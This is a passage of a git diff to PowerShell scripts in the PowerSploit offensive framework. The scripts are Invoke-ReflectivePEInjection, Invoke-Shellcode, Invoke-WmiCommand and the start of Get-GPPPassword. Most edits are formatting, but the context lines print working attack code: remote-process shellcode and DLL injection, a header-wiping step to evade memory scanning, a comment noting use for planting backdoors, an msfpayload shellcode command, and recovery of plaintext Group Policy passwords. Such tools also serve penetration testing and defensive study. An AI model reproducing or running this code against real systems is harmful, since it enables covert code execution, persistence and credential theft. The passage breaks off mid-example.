$SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length) + + $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) + if ($RSCAddr -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process for shellcode" + } + + $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) + if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) + { + Throw "Unable to write shellcode to remote process memory." + } + + $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions + $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) + if ($Result -ne 0) + { + Throw "Call to CreateRemoteThread to call GetProcAddress failed." + } + + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + } + } + elseif ($PEInfo.FileType -ieq "EXE") + { + #Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process + [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1) + [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00) + $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr + + #If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread + # This way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread. + [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) + Write-Verbose "Call EXE Main function. Address: $(Get-Hex $ExeMainPtr). Creating thread for the EXE to run in." + + $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null + + while($true) + { + [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0) + if ($ThreadDone -eq 1) + { + Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants + Write-Verbose "EXE thread has completed." + break + } + else + { + Start-Sleep -Seconds 1 + } + } + } + + return @($PEInfo.PEHandle, $EffectivePEHandle) + } + + + Function Invoke-MemoryFreeLibrary + { + Param( + [Parameter(Position=0, Mandatory=$true)] + [IntPtr] + $PEHandle + ) + + #Get Win32 constants and functions + $Win32Constants = Get-Win32Constants + $Win32Functions = Get-Win32Functions + $Win32Types = Get-Win32Types + + $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants + + #Call FreeLibrary for all the imports of the DLL + if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0) + { + [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress) + + while ($true) + { + $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR) + + #If the structure is null, it signals that this is the end of the array + if ($ImportDescriptor.Characteristics -eq 0 ` + -and $ImportDescriptor.FirstThunk -eq 0 ` + -and $ImportDescriptor.ForwarderChain -eq 0 ` + -and $ImportDescriptor.Name -eq 0 ` + -and $ImportDescriptor.TimeDateStamp -eq 0) + { + Write-Verbose "Done unloading the libraries needed by the PE" + break + } + + $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))) + $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath) + + if ($ImportDllHandle -eq $null) + { + Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue + } + + $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle) + if ($Success -eq $false) + { + Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue + } + + $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)) + } + } + + #Call DllMain with process detach + Write-Verbose "Calling dllmain so the DLL knows it is being unloaded" + $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) + $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool]) + $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate) + + $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null + + + $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) + if ($Success -eq $false) + { + Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue + } + } + + + Function Main + { + $Win32Functions = Get-Win32Functions + $Win32Types = Get-Win32Types + $Win32Constants = Get-Win32Constants + + $RemoteProcHandle = [IntPtr]::Zero + + #If a remote process to inject in to is specified, get a handle to it + if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne "")) + { + Throw "Can't supply a ProcId and ProcName, choose one or the other" + } + elseif ($ProcName -ne $null -and $ProcName -ne "") + { + $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue) + if ($Processes.Count -eq 0) + { + Throw "Can't find process $ProcName" + } + elseif ($Processes.Count -gt 1) + { + $ProcInfo = Get-Process | Where-Object { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId + Write-Output $ProcInfo + Throw "More than one instance of $ProcName found, please specify the process ID to inject in to." + } + else + { + $ProcId = $Processes[0].ID + } + } + + #Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future. + #If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege +# if ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId) +# { +# Write-Verbose "Getting SeDebugPrivilege" +# Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants +# } + + if (($ProcId -ne $null) -and ($ProcId -ne 0)) + { + $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId) + if ($RemoteProcHandle -eq [IntPtr]::Zero) + { + Throw "Couldn't obtain the handle for process ID: $ProcId" + } + + Write-Verbose "Got the handle for the remote process to inject in to" + } + + + #Load the PE reflectively + Write-Verbose "Calling Invoke-MemoryLoadLibrary" + $PEHandle = [IntPtr]::Zero + if ($RemoteProcHandle -eq [IntPtr]::Zero) + { + $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -ForceASLR $ForceASLR + } + else + { + $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle -ForceASLR $ForceASLR + } + if ($PELoadedInfo -eq [IntPtr]::Zero) + { + Throw "Unable to load PE, handle returned is NULL" + } + + $PEHandle = $PELoadedInfo[0] + $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process + + + #Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function. + $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants + if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero)) + { + ######################################### + ### YOUR CODE GOES HERE + ######################################### + switch ($FuncReturnType) + { + 'WString' { + Write-Verbose "Calling function with WString return type" + [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "WStringFunc" + if ($WStringFuncAddr -eq [IntPtr]::Zero) + { + Throw "Couldn't find function address." + } + $WStringFuncDelegate = Get-DelegateType @() ([IntPtr]) + $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate) + [IntPtr]$OutputPtr = $WStringFunc.Invoke() + $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr) + Write-Output $Output + } + + 'String' { + Write-Verbose "Calling function with String return type" + [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "StringFunc" + if ($StringFuncAddr -eq [IntPtr]::Zero) + { + Throw "Couldn't find function address." + } + $StringFuncDelegate = Get-DelegateType @() ([IntPtr]) + $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate) + [IntPtr]$OutputPtr = $StringFunc.Invoke() + $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr) + Write-Output $Output + } + + 'Void' { + Write-Verbose "Calling function with Void return type" + [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc" + if ($VoidFuncAddr -eq [IntPtr]::Zero) + { + Throw "Couldn't find function address." + } + $VoidFuncDelegate = Get-DelegateType @() ([Void]) + $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate) + $VoidFunc.Invoke() | Out-Null + } + } + ######################################### + ### END OF YOUR CODE + ######################################### + } + #For remote DLL injection, call a void function which takes no parameters + elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero)) + { + $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc" + if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero)) + { + Throw "VoidFunc couldn't be found in the DLL" + } + + $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle + $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle + + #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors + $Null = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions + } + + #Don't free a library if it is injected in a remote process or if it is an EXE. + #Note that all DLL's loaded by the EXE will remain loaded in memory. + if ($RemoteProcHandle -eq [IntPtr]::Zero -and $PEInfo.FileType -ieq "DLL") + { + Invoke-MemoryFreeLibrary -PEHandle $PEHandle + } + else + { + #Delete the PE file from memory. + $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) + if ($Success -eq $false) + { + Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue + } + } + + Write-Verbose "Done!" + } + + Main +} + +#Main function to either run the script locally or remotely +Function Main +{ + if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent) + { + $DebugPreference = "Continue" + } + + Write-Verbose "PowerShell ProcessID: $PID" + + #Verify the image is a valid PE file + $e_magic = ($PEBytes[0..1] | ForEach-Object {[Char] $_}) -join '' + + if ($e_magic -ne 'MZ') + { + throw 'PE is not a valid PE file.' + } + + if (-not $DoNotZeroMZ) { + # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg + # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be. + $PEBytes[0] = 0 + $PEBytes[1] = 0 + } + + #Add a "program name" to exeargs, just so the string looks as normal as possible (real args start indexing at 1) + if ($ExeArgs -ne $null -and $ExeArgs -ne '') + { + $ExeArgs = "ReflectiveExe $ExeArgs" + } + else + { + $ExeArgs = "ReflectiveExe" + } + + if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$") + { + Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) + } + else + { + Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName + } } Main diff --git a/CodeExecution/Invoke-Shellcode.ps1 b/CodeExecution/Invoke-Shellcode.ps1 index 28795583..1e889f6c 100644 --- a/CodeExecution/Invoke-Shellcode.ps1 +++ b/CodeExecution/Invoke-Shellcode.ps1 @@ -5,22 +5,22 @@ function Invoke-Shellcode Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. -PowerSploit Function: Invoke-Shellcode -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None - +PowerSploit Function: Invoke-Shellcode +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + .DESCRIPTION Portions of this project was based upon syringe.c v1.2 written by Spencer McIntyre PowerShell expects shellcode to be in the form 0xXX,0xXX,0xXX. To generate your shellcode in this form, you can use this command from within Backtrack (Thanks, Matt and g0tm1lk): -msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- +msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- Make sure to specify 'thread' for your exit process. Also, don't bother encoding your shellcode. It's entirely unnecessary. - + .PARAMETER ProcessID Process ID of the process you want to inject shellcode into. @@ -35,7 +35,7 @@ Injects shellcode without prompting for confirmation. By default, Invoke-Shellco .EXAMPLE -C:\PS> Invoke-Shellcode -ProcessId 4274 +Invoke-Shellcode -ProcessId 4274 Description ----------- @@ -43,7 +43,7 @@ Inject shellcode into process ID 4274. .EXAMPLE -C:\PS> Invoke-Shellcode +Invoke-Shellcode Description ----------- @@ -51,27 +51,32 @@ Inject shellcode into the running instance of PowerShell. .EXAMPLE -C:\PS> Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3) - +Invoke-Shellcode -Shellcode @(0x90,0x90,0xC3) + Description ----------- Overrides the shellcode included in the script with custom shellcode - 0x90 (NOP), 0x90 (NOP), 0xC3 (RET) Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit! #> -[CmdletBinding( DefaultParameterSetName = 'RunLocal', SupportsShouldProcess = $True , ConfirmImpact = 'High')] Param ( - [ValidateNotNullOrEmpty()] - [UInt16] - $ProcessID, - - [Parameter( ParameterSetName = 'RunLocal' )] - [ValidateNotNullOrEmpty()] - [Byte[]] - $Shellcode, - - [Switch] - $Force = $False -) + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [CmdletBinding( DefaultParameterSetName = 'RunLocal', ConfirmImpact = 'High')] + Param ( + [ValidateNotNullOrEmpty()] + [UInt16] + $ProcessID, + + [Parameter( ParameterSetName = 'RunLocal' )] + [ValidateNotNullOrEmpty()] + [Byte[]] + $Shellcode, + + [Switch] + $Force = $False + ) Set-StrictMode -Version 2.0 @@ -81,17 +86,17 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit # This could have been validated via 'ValidateScript' but the error generated with Get-Process is more descriptive Get-Process -Id $ProcessID -ErrorAction Stop | Out-Null } - + function Local:Get-DelegateType { Param ( [OutputType([Type])] - + [Parameter( Position = 0)] [Type[]] $Parameters = (New-Object Type[](0)), - + [Parameter( Position = 1 )] [Type] $ReturnType = [Void] @@ -106,7 +111,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) $MethodBuilder.SetImplementationFlags('Runtime, Managed') - + Write-Output $TypeBuilder.CreateType() } @@ -115,11 +120,11 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit Param ( [OutputType([IntPtr])] - + [Parameter( Position = 0, Mandatory = $True )] [String] $Module, - + [Parameter( Position = 1, Mandatory = $True )] [String] $Procedure @@ -136,7 +141,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) $tmpPtr = New-Object IntPtr $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) - + # Return the address of the function Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) } @@ -151,12 +156,12 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit $LittleEndianByteArray = New-Object Byte[](0) $Address.ToString("X$($IntSizePtr*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_) } } [System.Array]::Reverse($LittleEndianByteArray) - + Write-Output $LittleEndianByteArray } - + $CallStub = New-Object Byte[](0) - + if ($IntSizePtr -eq 8) { [Byte[]] $CallStub = 0x48,0xB8 # MOV QWORD RAX, &shellcode @@ -177,7 +182,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit $CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread $CallStub += 0xFF,0xD0 # CALL EAX } - + Write-Output $CallStub } @@ -185,7 +190,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit { # Open a handle to the process you want to inject into $hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF) - + if (!$hProcess) { Throw "Unable to open a process handle for PID: $ProcessID" @@ -197,7 +202,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit { # Determine if the process specified is 32 or 64 bit $IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null - + if ((!$IsWow64) -and $PowerShell32bit) { Throw 'Shellcode injection targeting a 64-bit process from 32-bit PowerShell is not supported. Use the 64-bit version of Powershell if you want this to work.' @@ -208,7 +213,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit { Throw 'No shellcode was placed in the $Shellcode32 variable!' } - + $Shellcode = $Shellcode32 Write-Verbose 'Injecting into a Wow64 process.' Write-Verbose 'Using 32-bit shellcode.' @@ -219,7 +224,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit { Throw 'No shellcode was placed in the $Shellcode64 variable!' } - + $Shellcode = $Shellcode64 Write-Verbose 'Using 64-bit shellcode.' } @@ -230,19 +235,19 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit { Throw 'No shellcode was placed in the $Shellcode32 variable!' } - + $Shellcode = $Shellcode32 Write-Verbose 'Using 32-bit shellcode.' } # Reserve and commit enough memory in remote process to hold the shellcode $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX) - + if (!$RemoteMemAddr) { Throw "Unable to allocate shellcode memory in PID: $ProcessID" } - + Write-Verbose "Shellcode memory reserved at 0x$($RemoteMemAddr.ToString("X$([IntPtr]::Size*2)"))" # Copy shellcode into the previously allocated memory @@ -255,25 +260,25 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit { # Build 32-bit inline assembly stub to call the shellcode upon creation of a remote thread. $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 32 - + Write-Verbose 'Emitting 32-bit assembly call stub.' } else { # Build 64-bit inline assembly stub to call the shellcode upon creation of a remote thread. $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 64 - + Write-Verbose 'Emitting 64-bit assembly call stub.' } # Allocate inline assembly stub $RemoteStubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reserve|Commit, RWX) - + if (!$RemoteStubAddr) { Throw "Unable to allocate thread call stub memory in PID: $ProcessID" } - + Write-Verbose "Thread call stub memory reserved at 0x$($RemoteStubAddr.ToString("X$([IntPtr]::Size*2)"))" # Write 32-bit assembly stub to remote process memory space @@ -281,7 +286,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit # Execute shellcode as a remote thread $ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $RemoteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero) - + if (!$ThreadHandle) { Throw "Unable to launch remote thread in PID: $ProcessID" @@ -301,7 +306,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit Throw 'No shellcode was placed in the $Shellcode32 variable!' return } - + $Shellcode = $Shellcode32 Write-Verbose 'Using 32-bit shellcode.' } @@ -312,36 +317,36 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit Throw 'No shellcode was placed in the $Shellcode64 variable!' return } - + $Shellcode = $Shellcode64 Write-Verbose 'Using 64-bit shellcode.' } - + # Allocate RWX memory for the shellcode $BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX) if (!$BaseAddress) { Throw "Unable to allocate shellcode memory in PID: $ProcessID" } - + Write-Verbose "Shellcode memory reserved at 0x$($BaseAddress.ToString("X$([IntPtr]::Size*2)"))" # Copy shellcode to RWX buffer [System.Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $BaseAddress, $Shellcode.Length) - + # Get address of ExitThread function $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread - + if ($PowerShell32bit) { $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 32 - + Write-Verbose 'Emitting 32-bit assembly call stub.' } else { $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 64 - + Write-Verbose 'Emitting 64-bit assembly call stub.' } @@ -351,7 +356,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit { Throw "Unable to allocate thread call stub." } - + Write-Verbose "Thread call stub memory reserved at 0x$($CallStubAddress.ToString("X$([IntPtr]::Size*2)"))" # Copy call stub to RWX buffer @@ -366,7 +371,7 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit # Wait for shellcode thread to terminate $WaitForSingleObject.Invoke($ThreadHandle, 0xFFFFFFFF) | Out-Null - + $VirtualFree.Invoke($CallStubAddress, $CallStub.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000) $VirtualFree.Invoke($BaseAddress, $Shellcode.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000) @@ -477,9 +482,9 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool]) $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate) - + Write-Verbose "Injecting shellcode into PID: $ProcessId" - + if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?', "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) ) { @@ -501,13 +506,13 @@ Warning: This script has no way to validate that your shellcode is 32 vs. 64-bit $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int32]) ([Int]) $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate) - + Write-Verbose "Injecting shellcode into PowerShell" - + if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?', "Injecting shellcode into the running PowerShell process!" ) ) { Inject-LocalShellcode } - } + } } diff --git a/CodeExecution/Invoke-WmiCommand.ps1 b/CodeExecution/Invoke-WmiCommand.ps1 index 0c064243..9f03f9b1 100644 --- a/CodeExecution/Invoke-WmiCommand.ps1 +++ b/CodeExecution/Invoke-WmiCommand.ps1 @@ -5,10 +5,10 @@ function Invoke-WmiCommand { Executes a PowerShell ScriptBlock on a target computer using WMI as a pure C2 channel. -Author: Matthew Graeber -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +Author: Matthew Graeber +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -149,6 +149,9 @@ Write-Host in your scripts though, you probably don't deserve to get the output of your payload back. :P #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')] [CmdletBinding()] Param ( [Parameter( Mandatory = $True )] diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index 0c03e0ad..7703508e 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -2,246 +2,350 @@ function Get-GPPPassword { <# .SYNOPSIS - Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. - - PowerSploit Function: Get-GPPPassword - Author: Chris Campbell (@obscuresec) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - +Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. + +PowerSploit Function: Get-GPPPassword +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + .DESCRIPTION - Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords. +Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords. .PARAMETER Server - - Specify the domain controller to search for. - Default's to the users current domain + +Specify the domain controller to search for. +Default's to the users current domain + +.PARAMETER SearchForest + +Map all reaschable trusts and search all reachable SYSVOLs. .EXAMPLE - PS C:\> Get-GPPPassword - - NewName : [BLANK] - Changed : {2014-02-21 05:28:53} - Passwords : {password12} - UserNames : {test1} - File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml - - NewName : {mspresenters} - Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} - Passwords : {Recycling*3ftw!, password123, password1234} - UserNames : {Administrator (built-in), DummyAccount, dummy2} - File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml - - NewName : [BLANK] - Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} - Passwords : {password, password1234$} - UserNames : {administrator, admin} - File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml - - NewName : [BLANK] - Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} - Passwords : {password, read123} - UserNames : {DEMO\Administrator, admin} - File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml +Get-GPPPassword + +NewName : [BLANK] +Changed : {2014-02-21 05:28:53} +Passwords : {password12} +UserNames : {test1} +File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml + +NewName : {mspresenters} +Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48} +Passwords : {Recycling*3ftw!, password123, password1234} +UserNames : {Administrator (built-in), DummyAccount, dummy2} +File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml + +NewName : [BLANK] +Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52} +Passwords : {password, password1234$} +UserNames : {administrator, admin} +File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml + +NewName : [BLANK] +Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36} +Passwords : {password, read123} +UserNames : {DEMO\Administrator, admin} +File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml .EXAMPLE - PS C:\> Get-GPPPassword -Server 